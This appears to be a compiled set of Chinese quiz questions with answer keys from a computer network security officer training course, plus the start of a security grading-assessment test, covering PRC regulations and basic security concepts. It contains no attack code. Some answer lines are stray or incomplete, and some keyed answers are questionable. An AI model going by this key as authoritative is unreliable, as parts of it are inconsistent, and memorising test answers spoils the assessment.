
D.国家标准

17.涉及国家事务、经济建设、国防建设、尖端科学技术等重要领域的单位办理备案手续时,应当出具———的审批证明。(单选)

C

A.互联网络主管部门

B.其单位本身

C.其行政主管部门

D.公安机关

18.《计算机病毒防治管理办法》是公安部令第————号发布的。(单选)

B

A.32

B.51

C.33

D.55

19.国家对计算机信息系统安全专用产品的销售—————-。(单选)

D

A.国家不作规定

B.有行业主观部门负责

C.与其他产品一样,可以任意进行

D.实行许可证制度

20.公安机关计算机管理监察机构应当保护计算机信息网络国际联网的公共安全,维护————单位和个人的合法权益的公众利益。(单选)C

A.从事网络业务的

B.从事计算机业务的

C.从事国际联网业务的

D.从事计算机信息工作的

21.下列行为中,———-是《计算机信息网络国际联网安全保护管理办法》所不允许利用国际联网进行的活动。(多选)

ABCD

A.侵犯国家的、社会的、集体的利益的行为

B.危害国家安全的行为

C.泄露国家秘密的行为

D.侵犯公民的合法权益的行为

第二章小测验正确答案

[计算机信息网络安全员培训(一)]

———-以上金融机构必须成立计算机信息系统安全保护领导小组,由分管领导任组长,并确定专职部门负责日常的计算机信息系统安全保护工作。(单选)

A

A.县级

B.区级

C.省级

D.市级

对不能停机的主机房必须采用双回路供电,或者配置发电机、持续工作———-小时以上的UPS等设施。(单选)

D

A.12

B.18

C.24

D.8

———-适用于一般的信息和信息系统,其受到破坏后,会对公民、法人和其他组织的权益有一定影响,但不危害国家安全、社会秩序、经济建设和公共利益。(单选)

B

A.监督保护级

B.自由保护级

C.指导保护级

D.强制保护级

计算机安全员培训的内容———-(多选)

ABCD

A.计算机病毒的防治

B.国家有关计算机信息系统安全保护的法律法规

C.计算机信息系统安全保护的技术以及信息系统安全风险管理的方法

D.计算机信息网络国际互联网的安全管理,计算机犯罪的防范、打击和案件报告制度

任何单位或个人,未经公安机关批准,不得从事下列活动———-(多选)

ABC

A.经营性网络服务

B.出版、销售、出租含计算机病毒机理、病毒源程序的书籍资料和媒体

C.传授计算机病毒机理和程序

D.上网浏览、查找资料

重要领域计算机信息系统安全保护工作是指公安机关公共信息网络安全监察部门对———-等重要领域计算机信息系统的设备(设施)安全、运行安全、信息安全等保护工作进行监督、检查、指导,维护计算机信息系统安全管理秩序的一项管理工作。

(多选)

ACD

A.经济建设、国防建设

B.教育文化

C.国家事务

D.尖端科学技术

公安机关公共信息网络安全监察部门对计算机信息系统使用单位实施安全监督检查可采取以下方法———-(多选)

ABCD

A.调阅、审查被检查单位的安全制度执行情况,运行记录及其他有关资料

B.利用信息系统安全检测设备进行专项安全检查

C.对计算机信息系统安全保护装置(含硬件和软件)的性能进行测试和模拟验证

D.向有关人员询问了解

对计算机信息系统中发生的案件、新的病毒种类或重大计算机安全事故故意隐瞒不报的,由公安机关处以警告或对个人处以500元以下罚款,对单位处以———-元以下罚款。(单选)

D

A.5000元

B.3000元

C.10000元

D.1000元

———-主管本省行政区域内的计算机安全管理工作。(单选)

C

A.省工商局

B.省保密局

C.省公安厅

D.省政府

———-主管山西省重要领域计算机信息系统安全保护工作。(单选)

C

A.山西省计算机行业协会

B.山西省国家安全厅

C.山西省公安厅

D.山西省国家保密局

金融机构应当对重要的数据建立数据备份制度,并做到———-。(单选)

B

A.本地双硬盘备份

B.异地保存

C.书面打印保存

D.本地异机备份

计算机信息系统安全专用产品销售许可证自批准之日起———-年内有效。(单选)

D

A.三

B.四

C.一

D.二

金融机构应当对与计算机有关的———-等设备进行定期检查维护。(多选)

BCD

A.UPS电源

B.卫星天线

C.电源接口

D.通信接口

制造、销售带有计算机病毒和有害数据的软、硬件以及载体的由公安机关处以———-罚款。(单选)

A

A.1000元以上,15000元以下

B.500元以上,1000元以下

C.1000元以上,5000元以下

D.1000元以上,10000元以下

———-负责本单位内各部门计算机信息系统安全管理和检查。(单选)

D

A.计算机终端操作员

B.计算机系统管理员

C.本单位第一负责人

D.计算机信息系统安全保护领导小组

公安机关应当对金融机构的———-进行安全知识培训。(单选)

A

A.计算机信息系统安全管理人员

B.计算机信息系统主要负责人

C.法人

D.教育处计算机信息系统终端操作员

金融机构计算机信息系统安全保护工作的基本任务是———-(多选)

ABCD

A.提高金融机构计算机信息系统的整体安全水平

B.预防、处理各种安全事故

C.预防、打击利用或者针对金融机构计算机信息系统进行的违法犯罪活动

D.保障国家、集体和个人财产的安全

———-应当加强对金融机构计算机信息系统安全保护工作实施的指导和监督,及时查处金融机构计算机信息系统发生的案件和事故。(单选)

B

A.中国人民银行

B.公安机关公共信息网络安全监察部门

C.国务院

D.审计部门

有以下情形之一的,公安机关公共信息网络安全监察部门应当组织开展安全监督检查。(多选)

ABCD

A.计算机信息系统中发生案件或安全事故的

B.新建立计算机信息系统或改建、扩建的

C.变更计算机信息系统的安全装置、安全技术措施的

D.有关单位提出要求,公安机关认为有必要的

金融机构的数据处理中心计算机主机房周围———-米内不得有危险建筑。(单选)

B

A.50

B.100

C.30

D.200

21.金融机构的业务用机不得用于———-等工具软件,不使用与业务无关的任何存贮介质。(多选)

ABC

A.源程序

B.编译工具

C.连接工具

D.防火墙

22.对计算机信息系统进行攻击性检测,应事前做出检测方案及攻击力度规定,报———-主管领导批准。(单选)

B

A.安全部门

B.公安部门

C.被测单位上级

D.被检测单位

23.重要系统应用软件运行过程中出现异常现象,金融机构应当立即报告———-,做好详细记录,经领导同意后,由系统管理人员进行检查、修改、维护。(单选)

D

A.本级公安机关

B.上级银行安全管理职能部门

C.本级人民银行

D.本级银行安全管理职能部门

24.对计算机信息系统中发生的案件、新的病毒种类和重大计算机安全事故,须在———-小时内向当地县级以上公安机关报告。(单选)

C

A.6

B.48

C.24

D.12

25.———-适用于一般的信息和信息系统,其受到破坏后,会对公民、法人和其他组织的权益有一定影响,但不危害国家安全、社会秩序、经济建设和公共利益。(单选)

B

A.强制保护级

B.自由保护级

C.指导保护级

D.监督保护级

26.金融机构对与国际联网的计算机信息系统,要按有关规定向———-登记备案。(单选)

A

A.公安机关

B.保密局

C.国务院

D.中国人民银行

27.———-负责等级保护工作中有关密码工作的监督、检查、指导。(单选)

A

A.国家密码管理部门

B.国家保密局

C.国家技术监督部门

D.公安机关

28.金融基层单位应当———-计算机信息系统安全管理人员。(单选)

C

A.不设立

B.设立专职

C.设立专职或兼职

D.设立兼职

29.金融机构计算机信息系统安全保护工作的基本任务是———-(多选)

ABCD

A.预防、处理各种安全事故

B.提高金融机构计算机信息系统的整体安全水平

C.保障国家、集体和个人财产的安全

D.预防、打击利用或者针对金融机构计算机信息系统进行的违法犯罪活动

30.县级以上金融机构必须成立计算机信息系统安全保护领导小组,领导小组名单应当报———-计算机信息系统安全保护领导小组和公安机关计算机管理监察部门备案。(单选)

D

A.中国人民银行

B.上级人民银行

C.上级金融机构

D.同级人民银行

31.《中华人民共和国计算机信息系统安全保护条例》规定是由———-颁布的。(单选)

B

A.国家安全部

B.国务院

C.信息产业部

D.公安部

32.《山西省计算机安全管理规定》从———-开始实施。(单选)

C

A.1995年3月1日

B.1994年3月26日

C.1996年11月14日

D.1995年2月15日

33.计算机安全员培训的对象为———-(多选)

ABCD

A.计算机信息网络国际联网的联网单位、接入单位和互联网信息服务单位的安全员

B.从事计算机信息系统管理、维护人员以及重要岗位的从业人员

C.计算机信息系统使用单位安全管理组织的负责人和安全员

D.全省各级公安机关从事计算机安全监察工作的民警

对新购进的计算机和初次使用的软件、数据、载体,应经———-进行检测,确认无病毒和有害数据后方可投入使用。(单选)

A

A.本单位计算机安全管理员

B.计算机协会

C.本单位负责人

D.网络安全监察部门

第三章小测验正确答案

[计算机信息网络安全员培训(一)]

互联网上网服务营业场所经营单位提供上网消费者使用的计算机必须通过———-的方式接入互联网,不得直接接入互联网(单选)

A

A.局域网

B.以上全部均可

C.拨号上网

D.城域网

互联网上网服务营业场所经营单位应当对上网消费者的身份证等有效证件进行核对、登记,并记录有关上网信息。登记内容和记录备份保存时间不得少于———-日(单选)

B

A.90

B.60

C.30

D.20

互联单位、接入单位及使用计算机信息网络国际联网的法人和其他组织应当履行下列安全保护职责———-(多选)

ABCD

A.建立计算机信息网络电子公告系统的用户登记和信息管理制度

B.落实安全保护技术措施,保障本网络的运行安全和信息安全

C.负责对本网络用户的安全教育和培训

D.负责本网络的安全保护管理工作,建立健全安全保护管理制度

接入单位、互联单位,不履行备案职责的,由公安机关给予———-的惩罚(单选)

B

A.追究刑事责任

B.警告、停机整顿

C.警告

D.警告、处以5000元

互联单位、接入单位及使用计算机信息网络国际联网的法人和其他组织发现利用国际联网进行危害国家安全、泄露国家秘密或侵犯国家的、社会的、集体的利益和公民的合法权益的情况,应在———-向公安机关报告(单选)

C

A.一小时内

B.八小时内

C.二十四小时内

D.三天内

互联单位、接入单位、使用计算机信息网络国际联网的法人和其他组织(包括跨省、自治区、直辖市联网的单位和所属的分支机构),应当自网络正式联通之日起———-日内,到所在地的省、自治区、直辖市人民政府公安机关指定的受理机关办理备案手续(单选)

B

A.六十

B.三十

C.十

D.九十

互联网上网服务营业场所的服务对象是———-(单选)

D

A.大学生

B.中小学生

C.特定人群

D.公众

互联网上网服务营业场所每日营业时间限于———-(单选)

D

A.0时至24时

B.8时至12时

C.8时至18时

D.8时至24时

用于保护计算机信息系统安全的专用硬件和软件产品,称为———-(单选)

A

A.计算机信息系统安全专用产品

B.计算机专用产品

C.计算机特殊用途产品

D.计算机安全产品

任何单位和个人不得有下列传播计算机病毒的行为———-(多选)

ABCD

A.故意输入计算机病毒,危害计算机信息系统安全

B.销售、出租、附赠含有计算机病毒的媒体

C.其它传播计算机病毒的行为

D.向他人提供含有计算机病毒的文件、软件、媒体

互联网上网服务营业场所经营单位可以经营———-游戏(单选)

A

A.网络

B.全部

C.单机

D.非网络

计算机信息系统的使用单位有下列行为之一的,由公安机关处以警告,并根据情况责令限期改正;逾期不改正的,对单位处以一千元以下罚款,对单位直接负责的主管人员和直接责任人员处以五百元以下的罚款———-(多选)

ABCD

A.未对本单位计算机信息系统使用人员进行计算机病毒防治教育和培训的

B.未及时检测、清除计算机信息系统中的计算机病毒,对计算机信息系统造成危害的

C.未使用具有计算机信息系统安全专用产品销售许可证的计算机病毒防治产品,对计算机信息系统造成危害的

D.未建立本单位计算机病毒防治管理制度的;未采取计算机病毒安全技术防治措施的

有下列行为———-之一的,由公安机关责令限期改正,给予警告,有违法所得的,没收违法所得;在规定的限期内未改正的,对单位的主管负责人员和其他直接责任人员可以并处五千元以下的罚款,对单位可以并处一万五千元以下的罚款;情节严重的,并可以给予六个月以内的停止联网、停机整顿的处罚,必要时可以建议原发证、审批机构吊销经营许可证或者取消联网资格。(多选)

ABCD

A.未采取安全技术保护措施的

B.未建立安全保护管理制度的

C.未提供安全保护管理所需信息、资料及数据文件,或者所提供内容不真实的

D.未对网络用户进行安全教育和培训的

计算机信息系统的使用单位在计算机病毒防治工作中应当履行下列职责———-(多选)

ACD

A.对本单位计算机信息系统使用人员进行计算机病毒防治教育和培训;及时检测、清除计算机信息系统中的计算机病毒,并备有检测、清除的纪录

B.提供含有计算机病毒的文件进行研究

C.建立本单位的计算机病毒防治管理制度;采取计算机病毒安全技术防治措施

D.使用具有计算机信息系统安全专用产品销售许可证的计算机病毒防治产品;对因计算机病毒引起的计算机信息系统瘫痪、程序和数据严重破坏等重大事故及时向公安机关报告,并保护现场

中学、小学校园周围———-范围内和居民住宅楼(院)内不得设立互联网上网服务营业场所(单选)

A

A.200米

B.300米

C.100米

D.150米

设立互联网上网服务营业场所经营单位,应当采用———-的组织形式(单选)

B

A.工商户

B.企业

C.个人合伙

D.个体工商户

下列行为中,———-是《计算机信息网络国际联网安全保护管理办法》所不允许利用国际联网进行的活动。(多选)

ABCD

A.泄漏国家秘密的行为

B.侵犯公民的合法权益的行为

C.侵犯国家的、社会的、集体的利益的行为

D.危害国家安全的行为

制定《计算机信息系统安全专用产品检测和销售许可证管理办法》是为了———-(多选)ACD

A.保证安全专用产品的安全功能

B.加强计算机行业的发展

C.维护计算机信息系统的安全

D.加强计算机信息系统安全专用产品的管理

以下———-属于《计算机信息网络国际联网安全保护管理办法》中“安全保护管理制度”内容(多选)

ABCD

A.安全管理人员岗位工作职责

B.病毒检测和网络安全漏洞检测制度

C.违法案件报告和协助查处制度A

D.安全教育和培训制度

ABCD

重点单位的重要岗位应配备———-名计算机安全员(单选)

B

A.1

B.2-4

C.2-3

D.1-2

B盘/第一章小测验正确答案

[计算机信息网络安全员培训(二)]

风险评估的三个要素(单选)

D

A.硬件,软件和人

B.组织,技术和信息

C.政策,结构和技术

D.资产,威胁和脆弱性

国标”学科分类与代码”中安全科学技术是(单选)

B

A.安全科学技术是二级学科,代码620

B.安全科学技术是一级学科,代码620

C.安全科学技术是一级学科,代码110

D.安全科学技术是二级学科,代码110

网络环境下的safety

是指(单选)

A

A.网络具有可靠性,容灾性,鲁棒性

B.网络的具有防止敌对势力攻击的能力

C.防黑客入侵,防病毒,窃密

D.网络具有可靠性,可防病毒,窃密和敌对势力攻击

信息网络安全(风险)评估的方法(单选)

B

A.定量评估

B.定性评估与定量评估相结合

C.定点评估

D.定性评估

安全的含义(单选)

A

A.security(安全)和safety(可靠)

B.safety(可靠)

C.risk(风险)

D.security(安全)

SQL

杀手蠕虫病毒发作的特征是什么(单选)

A

A.大量消耗网络带宽

B.破坏PC游戏程序

C.攻击个人PC终端

D.攻击手机网络

人对网络的依赖性最高的时代(单选)

C

A.PC时代

B.专网时代

C.多网合一时代

D.主机时代

鲁棒性,可靠性的金三角(单选)

B

A.多样性,保密性和完整性

B.多样性,容余性和模化性

C.保密性,完整性和可获得性

D.可靠性,保密性和完整性

我国的计算机年犯罪率的增长是(单选)

A

A.60%

B.160%

C.10%

D.300%

网络安全在多网合一时代的脆弱性体现在(单选)

C

A.软件的脆弱性

B.网络的脆弱性

C.管理的脆弱性

D.应用的脆弱性

信息安全的金三角(单选)

A

A.保密性,完整性和可获得性

B.多样性,保密性和完整性

C.可靠性,保密性和完整性

D.多样性,容余性和模化性

信息安全风险缺口是指(单选)

A

A.IT

的发展与安全投入,安全意识和安全手段的不平衡

B.信息化中,信息不足产生的漏洞

C.

计算中心的火灾隐患

D.计算机网络运行,维护的漏洞

当今IT

的发展与安全投入,安全意识和安全手段之间形成(单选)

A

A.安全风险缺口

B.管理方式的变革

C.管理方式的缺口

D.安全风险屏障

PDR模型与访问控制的主要区别(单选)

B

A.PDR采用定性评估与定量评估相结合

B.PDR把安全对象看作一个整体

C.PDR的关键因素是人

D.PDR作为系统保护的第一道防线

信息安全中PDR模型的关键因素是(单选)

D

A.客体

B.模型

C.技术

D.人

网络环境下的safety

是指(单选)

A

A.网络具有可靠性,容灾性,鲁棒性

B.防黑客入侵,防病毒,窃密

C.网络具有可靠性,可防病毒,窃密和敌对势力攻击

D.网络的具有防止敌对势力攻击的能力

网络环境下的security是指(单选)

B

A.网络具有可靠性,容灾性,鲁棒性

B.防黑客入侵,防病毒,窃密和敌对势力攻击

C.网络的具有防止敌对势力攻击的能力

D.网络具有可靠性,可防病毒,

窃密和敌对势力攻击网络攻击的种类(单选)

D

A.硬件攻击,软件攻击

B.黑客攻击,病毒攻击

C.物理攻击,黑客攻击,病毒攻击

D.物理攻击,语法攻击,语义攻击

第二章小测验正确答案

[计算机信息网络安全员培训(二)]

操作系统在各种应用软件之上为计算机使用者提供统一的人机接口(单选)

A

A.错

B.对

操作系统包含的具体功能有哪些?ABCD

A.I/O处理

B.作业协调

C.安全功能

D.资源管理

在Winodws

NT操作系统中每一个对象(如文件,用户等)都具备多个SID(单选)

B

A.对

B.错

下面哪个功能属于操作系统中的中断处理功能(单选)

C

A.控制用户的作业排序和运行

B.保护系统程序和作业,禁止不合要求的对程序和数据的访问

C.实现主机和外设的并行处理以及异常情况的处理

D.对CPU,内存,外设以及各类程序和数据进行管理

网络操作系统应当提供哪些安全保障(多选)

ABCDE

A.数据保密性(Data

Confidentiality)

B.授权(Authorization)

C.验证(Authentication)

D.数据一致性(Data

Integrity)

E.数据的不可否认性(Data

Nonrepudiation)

TCSEC是美国的计算机安全评估机构和安全标准制定机构(单选)

B

A.错

B.对

下面哪一项情景符合Web服务器的功能(单选)

B

A.用ICQ或QQ和朋友聊天

B.上网浏览网页

C.网上购物

D.从Internet下载或上传文件

下面哪个功能属于操作系统中的错误处理功能(单选)

C

A.对CPU,内存,外设以及各类程序和数据进行管理

B.实现主机和外设的并行处理以及异常情况的处理

C.以合理的方式处理错误事件,而不至于影响其他程序的正常运行

D.控制用户的作业排序和运行

下面哪个功能属于操作系统中的资源管理功能(单选)

A

A.对CPU,内存,外设以及各类程序和数据进行管理

B.实现主机和外设的并行处理以及异常情况的处理

C.控制用户的作业排序和运行

D.处理输入/输出事务

SANS在过去两个年度(2001,2002)评出的最严重或说最常见的安全漏洞是什么?(单选)

A

A.用户在安全系统时采用系统的默认(Default)安装形式,而不做必要的安全配置

B.数据和系统备份不完整

C.防火墙上开放大量不必要的端口

D.

以下操作系统中,哪种不属于网络操作系统(单选)

B

A.Windows

2000

B.Windows

XP

C.Linux

D.Windows

NT

严格的口令策略应当包含哪些要素(多选)

ABC

A.同时包含数字,字母和特殊字符

B.系统强制要求定期更改口令

C.满足一定的长度,比如8位以上

D.用户可以设置空口令

下面哪个功能属于操作系统中的日志记录功能(单选)

A

A.对计算机用户访问系统和资源的情况进行记录

B.保护系统程序和作业,禁止不合要求的对程序和数据的访问

C.以合理的方式处理错误事件,而不至于影响其他程序的正常运行

D.控制用户的作业排序和运行

下面哪一个情景属于审计(Audit)(单选)

C

A.用户在网络上共享了自己编写的一份Office文档,并设定哪些用户可以阅读,哪些用户可以修改

B.用户依照系统提示输入用户名和口令

C.某个人尝试登录到你的计算机中,但是口令输入的不对,系统提示口令错误,并将这次失

败的登录过程纪录在系统日志中

D.用户使用加密软件对自己编写的Office文档进行加密,以阻止其他人得到这份拷贝后看到文档中的内容

在设计系统安全策略时要首先评估可能受到的安全威胁(单选)

B

A.错

B.对

Windows

NT中用户登录域的口令是以明文方式传输的(单选)

A

A.错

B.对

造成操作系统安全漏洞的原因(多选)

ABC

A.不安全的编程语言

B.不安全的编程习惯

C.考虑不周的架构设计

Windows

NT域(Domain)中的用户帐号和口令信息存储在”域控制器”中(单选)

B

A.错

B.对

下列应用哪些属于网络应用(多选)

ABCDEF

A.网上银行

B.Web浏览

C.即时通讯

D.email电子邮件

E.FTP文件传输

F.电子商务

下面哪个功能属于操作系统中的I/O处理功能(单选)

B

A.保护系统程序和作业,禁止不合要求的对程序和数据的访问

B.处理输入/输出事务

C.对计算机用户访问系统和资源的情况进行记录

D.以合理的方式处理错误事件,而不至于影响其他程序的正常运行

?

下面哪个操作系统符合C2级安全标准(单选)

D

A.Windows

98

B.MS-DOS

C.Windows

3.1

D.Windows

NT

?

下面哪种编程语言因为灵活和功能强大曾经被广泛使用,但因其本身对安全问题考虑不周,而造成了现在很多软件的安全漏洞(单选)

B

A.FORTRAN

B.C/C++

C.Cobol

D.Java

?

下面哪些系统属于Web服务器(多选)

CD

A.QQ

B.Lotus

Notes

C.IIS

D.Apache

?

造成操作系统安全漏洞的原因(多选)

ABC

A.考虑不周的架构设计

B.不安全的编程习惯

C.不安全的编程语言

?

Windows

NT提供的分布式安全环境又被称为(单选)

B

A.对等网

B.域(Domain)

C.工作组

D.安全网

?

系统安全的责任在于IT技术人员,最终用户不需要了解安全问题(单选)

B

A.对

B.错

?

安装系统后应当根据厂商或安全咨询机构的建议对系统进行必要的安全配置(单选)

B

A.错

B.对

?

从系统整体看,下述那些问题属于系统安全漏洞(多选)

ABCDE

A.人为错误

B.缺少足够的安全知识

C.产品有Bugs

D.产品缺少安全功能

E.缺少针对安全的系统设计

?

网络操作系统应当提供哪些安全保障(多选)

ABCD

A.数据保密性(Data

Confidentiality)

B.数据一致性(Data

Integrity)

C.数据的不可否认性(Data

Nonrepudiation)

D.验证(Authentication)

E.授权(Authorization)

?

下列应用哪些属于网络应用(多选)

ABCDEF

A.email电子邮件

B.Web浏览

C.即时通讯

D.电子商务

E.FTP文件传输

F.网上银行

?

网络操作系统用于对连接在同一物理网络中的多台计算机及其设备之间的通讯进行有效的监护和管理(单选)

A

A.对

B.错

?

按用途和设计划分,操作系统有哪些种类?(多选)

ABCD

A.网络操作系统

B.实时操作系统

C.分时操作系统

D.批处理操作系统

?

下面哪一项情景符合Web服务器的功能(单选)

D

A.用ICQ或QQ和朋友聊天

B.网上购物

C.从Internet下载或上传文件

D.上网浏览网页

?

下面哪一个情景属于身份验证(Authentication)过程(单选)

A

A.用户依照系统提示输入用户名和口令

B.某个人尝试登录到你的计算机中,但是口令输入的不对,系统提示口令错误,并将这次失败的登录过程纪录在系统日志中

C.用户在网络上共享了自己编写的一份Office文档,并设定哪些用户可以阅读,哪些用户可以修改

D.用户使用加密软件对自己编写的Office文档进行加密,以阻止其他人得到这份拷贝后看到文档中的内容

?

Windows

NT域(Domain)中的用户帐号和口令信息存储在”域控制器”中(单选)

A

A.对

B.错

?

Windows

NT的”域”控制机制具备哪些安全特性?(多选)

ACD

A.访问控制

B.数据通讯的加密

C.审计(日志)

D.用户身份验证

?

下面哪个操作系统提供分布式安全控制机制(单选)

C

A.Windows

3.1

B.Windows

98

C.Windows

NT

D.MS-DOS

?

下面哪个功能属于操作系统中的错误处理功能(单选)

C

A.实现主机和外设的并行处理以及异常情况的处理

B.对CPU,内存,外设以及各类程序和数据进行管理

C.以合理的方式处理错误事件,而不至于影响其他程序的正常运行

D.控制用户的作业排序和运行

?

Linux操作系统具有和Unix系统相近的使用和管理方式(单选)

A

A.对

B.错

?

在Winodws

NT操作系统中每一个对象(如文件,用户等)都具备多个SID(单选)

A

A.错

B.对

第二章小测验正确答案

[计算机信息网络安全员培训(二)]

1.DOS攻击的Smurf攻击是利用____进行攻击(单选)

C

A.通讯握手过程问题

B.中间代理

C.其他网络

全国首例计算机入侵银行系统是通过(单选)

B

A.通过内部系统进行攻击

B.安装无限MODEM进行攻击

C.通过搭线进行攻击

3.从统计的情况看,造成危害最大的黑客攻击是:(单选)

C

A.蠕虫攻击

B.漏洞攻击

C.病毒攻击

4.1433端口漏洞是(单选)

C

A.数据库漏洞

B.输入法漏洞

C.操作系统漏洞

跨客(CRACKER)进入系统的目的是:(单选)

C

A.进行系统维护

B.主要处于好奇

C.主要是为了窃取和破坏信息资源

病毒攻击是危害最大、影响最广、发展最快的攻击技术(单选)

A

A.是

B.不是

据调查大约有15%的人使用单词或人名做密码(单选)

B

A.不是

B.是

NMAP是(单选)

B

A.防范工具

B.扫描工具

C.网络协议

黑色星期四”是因有人通过BELL实验室与Internet连接的有漏洞的机器上放置了一个蠕虫程序而引起网络灾难得名的(单选)

A

A.不是

B.是

在信息战中中立国的体现要比非信息战简单(单选)

B

A.是

B.不是

大家所认为的对Internet安全技术进行研究是从_______时候开始的(单选)

C

A.第一个计算机病毒出现

B.Internet

诞生

C.黑色星期四

黑色星期四是指:(单选)

B

A.1999年6月24日星期四

B.1998年11月3日星期四

C.2000年4月13日星期四

DDOS攻击是利用_____进行攻击(单选)

B

A.通讯握手过程问题

B.中间代理

C.其他网络

网络的发展促进了人们的交流,同时带来了相应的安全问题(单选)

A

A.是

B.不是

Unicode是否可以穿透防火墙(单选)

A

A.可以

B.不可以

商业间谍攻击计算机系统的主要目的是(单选)

A

A.窃取商业信息

B.窃取政治信息

C.窃取技术信息

可能给系统造成影响或者破坏的人包括:(单选)

B

A.只有黑客

B.所有网络与信息系统使用者

C.只有跨客

本课程中所讨论的黑客分为:(单选)

A

A.5类

B.6类

C.4类

具有政治目的的黑客只对政府的网络与信息资源造成危害(单选)

A

A.不是

B.是

通常一个三个字符的口令破解需要(单选)

C

A.18毫秒

B.18分

C.18

邮件炸弹攻击主要是(单选)

答对

A.破坏被攻击者邮件客户端

B.破坏被攻击者邮件服务器

C.添满被攻击者邮箱

C

跨客(CRACKER)是:(单选)

答对

A.网络闲逛者

B.网络与系统的入侵

C.犯罪分子

B

通过口令使用习惯调查发现有大约___%的人使用的口令长度低于5个字符的(单选)

A

A.51.5

B.52.5

C.50.5

缓冲区溢出(单选)

C

A.只是应用层漏洞

B.只是系统层漏洞

C.既是系统层漏洞也是应用层漏洞

逻辑炸弹通常是通过(单选)

A

A.指定条件或外来触发启动执行,实施破坏

B.通过管理员控制启动执行,实施破坏

C.必须远程控制启动执行,实施破坏

黑客是:(单选)

C

A.犯罪分子

B.网络与系统入侵者

C.网络闲逛者

1996年上海某寻呼台发生的逻辑炸弹事件,造事者被判”情节轻微,无罪释放”是因为(单选)

B

A.没有造成破坏

B.法律不健全

C.证据不足

DOS攻击的Syn

flood攻击是利用______进行攻击(单选)

A

A.通讯握手过程问题

B.其他网络

C.中间代理

信息战的战争危害较常规战争的危害(单选)

A

A.不一定

B.轻

C.重

口令攻击的主要目的是(单选)

B

A.仅获取口令没有用途

B.获取口令进入系统

C.获取口令破坏系统

C盘/第一章小测验正确答案

[计算机信息网络安全员培训(一)]

(1)一封电子邮件可以拆分成多个IP包,每个IP包可以沿不同的路径到达目的地。(单选)

B

A.错

B.对

(2)计算机网络最早出现在哪个年代(单选)

A

A.20世纪60年代

B.20世纪90年代

C.20世纪50年代

D.20世纪80年代

(3)关于TCP

和UDP

协议区别的描述中,哪句话是错误的?(单选)

D

A.TCP

协议可靠性高,UDP则需要应用层保证数据传输的可靠性

B.TCP协议是面向连接的,而UDP是无连接的

C.UDP

协议比TCP

协议的安全性差

D.UDP

协议要求对发出据的每个数据包都要确认

(4)以下对Internet特征的描述哪个是错误的?(单选)

B

A.Internet使用TCP/IP协议进行通信

B.Internet

可以保障服务质量

C.Internet使用分组交换技术

D.Internet是世界上最大的计算机网络

(5)ATM

技术领先于TCP/IP技术,即将取代IP技术,实现语音、视频、数据传输网络的三网合一(单选)

A

A.错

B.对

(6)OSI网络参考模型中第七层协议的名称是什么?(单选)

B

A.网络层

B.应用层

C.会话层

D.传输层

(7)Code

Red爆发于2001年7月,利用微软的IIS漏洞在Web服务器之间传播。针对这一漏洞,微软早在2001年三月就发布了相关的补丁。如果今天服务器仍然感染Code

Red,那么属于哪个阶段的问题?(单选)

A

A.系统管理员维护阶段的失误

B.最终用户使用阶段的失误

C.微软公司软件的实现阶段的失误

D.微软公司软件的设计阶段的失误

(8)以下哪种技术用来描述异步传输模式(ATM)?(单选)

A

A.信元交换;

B.电路交换;

C.报文交换;

D.无连接服务

(9)以下对Internet

路由器功能的描述中,哪些是错误的?(单选)

A

A.为源和目的之间的通信建立一条虚电路

B.一般不检查IP包的源地址的有效性

C.通过路由协议学习网络的拓扑结构

D.根据目标地址寻找路径

(10)路由器在转发IP分组时,一般不检查IP分组的源地址,因此可以伪造IP分组的源地址进行攻击,使得网络管理员无法追踪。(单选)

D

A.

B.错

C.

D.对

(11)网络管理使用哪种协议?(单选)

A

A.SNMP

B.TCP

C.FTP

D.SMTP

(12)电子邮件使用那种协议?(单选)

D

A.SNMP

B.FTP

C.HTTP

D.SMTP

(13)Internet面临的挑战中,哪个是错误的?(单选)

D

A.Internet

缺乏服务质量控制

B.Internet

安全性太差

C.Internet

地址空间不够用

D.Internet

用户太少

(14)域名服务系统(DNS)的功能是(单选)

D

A.完成主机名和IP地址之间的转换

B.完成域名和电子邮件地址之间的转换

C.完成域名和网卡地址之间的转换

D.完成域名和IP地址之间的转换

(15)关于80年代Mirros

蠕虫危害的描述,哪句话是错误的?(单选)

C

A.大量的流量堵塞了网络,导致网络瘫痪

B.占用了大量的计算机处理器的时间,导致拒绝服务

C.窃取用户的机密信息,破坏计算机数据文件

D.该蠕虫利用Unix系统上的漏洞传播

(16)最早的计算机网络与传统的通信网络最大的区别是什么?(单选)

B

A.计算机网络采用了电路交换技术。

B.计算机网络采用了分组交换技术。

C.计算机网络带宽和速度大大提高。

D.计算机网络的可靠性大大提高。

(17)亚太地区的IP地址分配是由哪个组织负责的?(单选)

B

A.APRICOT

1 信息安全等级测评师测试

一、单选题(14分)

1、下列不属于网络安全测试范畴的是( C ) A. 结构安全 B. 边界完整性检查 C. 剩余信息保护 D. 网络设备防护

2、下列关于安全审计的内容说法中错误的是( D )。 A. 应对网络系统中的网络设备运行情况、网络流量、用户行为等进行 日志记录。 B. 审计记录应包括:事件的日期和时间、用户、事件类型、事件是否 成功及其他与审计相关的信息。 C. 应能根据记录数据进行分析,并生成报表。 D. 为了节约存储空间,审计记录可以随意删除、修改或覆盖。

3、在思科路由器中,为实现超时10分钟后自动断开连接,实现的命令应 为下列哪一个。( A ) A. exec-timeout 10 0 B. exec-timeout 0 10 C. idle-timeout 10 0 D. idle-timeout 0 10

4、用于发现攻击目标。( A ) A. ping扫描 B. 操作系统扫描 C. 端口扫描 D. 漏洞扫描

Ping扫描:用于发现攻击目标

操作系统识别扫描:对目标主机运行的操作系统进行识别

端口扫描:用于查看攻击目标处于监听或运行状态的…

5、防火墙提供的接入模式中包括。( ABCD ) A. 网关模式 B. 透明模式 C. 混合模式 D. 旁路接入模式

6、路由器工作在 。( C ) A. 应用层 B. 链接层 C. 网络层 D. 传输层

7、防火墙通过__控制来阻塞邮件附件中的病毒。( A ) A.数据控制 B.连接控制 C.ACL控制 D.协议控制

二、多选题(36分)

1、不同设VLAN之间要进行通信,可以通过__。( A B ) A交换机 B路由器 C网闸 D入侵检测 E入侵防御系统

2、能够起到访问控制功能的设备有__。( ABD ) A网闸 B三层交换机 C入侵检测系统 D防火墙

3、路由器可以通过 来限制带宽。( ABCD ) A.源地址 B.目的地址 C.用户 D.协议

4、IPSec通过 实现密钥交换、管理及安全协商。( CD ) A. AH B. ESP C. ISAKMP/Oakley D. SKIP

5、交换机可根据____来限制应用数据流的最大流量。( ACD ) A.IP地址 B.网络连接数 C.协议 D.端口

